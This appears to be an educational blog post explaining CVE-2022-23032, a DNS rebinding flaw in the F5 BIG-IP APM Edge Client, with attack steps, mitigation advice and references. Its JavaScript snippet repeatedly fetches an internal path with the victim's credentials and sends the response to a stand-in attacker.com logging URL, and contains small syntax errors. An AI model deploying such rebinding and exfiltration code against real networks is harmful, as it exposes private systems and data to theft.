CVE-2022-23032 - DNS Rebinding Attack in BIG-IP APM Edge Client—Explained

In early 2022, security researchers identified a dangerous vulnerability in F5 BIG-IP Access Policy Manager (APM)—one of the most popular VPN and network access solutions in use by enterprises. The high-severity flaw, tracked as CVE-2022-23032, makes Mac and Windows clients wide open to DNS rebinding attacks if they use the BIG-IP Edge Client with proxy settings enabled. This vulnerability lurked in all versions before 7.2.1.4.

In this post, we’ll cover in simple language what CVE-2022-23032 is, why it matters, show code snippets illustrating the danger, and explain exploiting it. We’ll also give you all the upstream references so you can dig deeper.

First, let’s recall DNS rebinding

- Attackers trick a user’s browser/computer into visiting a malicious website.
- The attacker’s server makes the browser believe that internal network resources (like your office VPN) are at the same address as the attacker’s site.
- This lets the attacker send or receive requests _inside your private network_ using your computer as a bridge.

The Heart of the Bug

In every BIG-IP APM software version _before 7.2.1.4_, when network access resources configured proxy settings (meaning a browser routes traffic through the VPN connector), the Edge Client failed to ensure a strict network boundary. This meant an attacker could make the Edge Client connect to attacker-chosen internal IPs by rebinding DNS, exposing sensitive systems.

In Plain English

If you used F5’s Edge Client to connect at work, and your company had set up proxy settings in the VPN portal, opening a malicious web page could let hackers attack your office network—using your own machine!

Attacker sets up a domain (evil.com) and points it in DNS to their own server.

2. You, with the vulnerable BIG-IP Edge Client running on your Windows or Mac, visit evil.com on your browser.
3. Evil code on evil.com in the background opens a connection (like an XMLHttpRequest or websocket) to the host name it’s running on.
4. DNS server for evil.com is set up to change its answer a few seconds after initial load—from the attacker's IP to an internal IP inside your company (like 192.168.1.1).
5. Now, the browser (still running as you, with the Edge Client connected) is tricked into talking to your internal systems, forwarding traffic to the internal network via the Edge Client’s proxy settings.

Because BIG-IP didn’t lock down this behavior, the attacker’s web code could tunnel requests into your private VPN!

Code Snippet: Malicious DNS Rebinding Example

Below is a simplified JavaScript example for conceptual use only—do not run malicious code! This is what an attacker might deploy on evil.com:

// On evil.com, loaded by victim
setInterval(() => {
  fetch('http://evil.com/sensitive-path';, {
    method: 'GET',
    // Cookie and credentials as the victim
    credentials: 'include'
  })
    .then(resp => resp.text())
    .then(data => {
      // Send exfiltrated data back to attacker
      fetch('https://attacker.com/log?'; + encodeURIComponent(data));
    })
    .catch(() => {});
}, 200);

// After initial requests, attacker’s DNS server changes evil.com to 192.168.1.1
// Now, browser tries to access internal resources, thinking it's still evil.com

Depending on configuration, the Edge Client’s proxy would let this traffic “leak” into your intra-office network.

Fixed in: 7.2.1.4 (and later) of F5 BIG-IP APM.

- Mitigation: Always upgrade to a supported version. Do not trust out-of-support versions—they are not protected!
- If upgrade impossible: Disable network proxy settings in APM resources unless needed, block untrusted web traffic for VPN-connected users.

Impact: Who’s at Risk?

1. Organizations with BIG-IP Edge Client on Mac/Windows

Software version older than 7.2.1.4

If your company uses APM and connects end-users with Edge Client + proxy, it's critical to check version status.

References and Further Reading

- F5 Security Advisory (K33845353)
- NVD entry for CVE-2022-23032
- Technical write-up (Rapid7)
- Understanding DNS rebinding (Wikipedia)

Conclusion

CVE-2022-23032 is a powerful reminder: network boundary controls _must_ be airtight, especially where proxies and VPN clients mix with the modern browser security model. If you’re using F5’s BIG-IP Edge Client before 7.2.1.4 with proxy settings, _you must upgrade immediately_—or risk being the conduit for a silent, dangerous network breach.

Stay safe. Stay updated.

> Disclaimer: This educational example explains a real vulnerability. Never use this knowledge to attack or harm; always act lawfully and ethically!


*Written for clarity and defense by a cybersecurity educator — please link back if sharing!*

Timeline

Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 19:21:00 UTC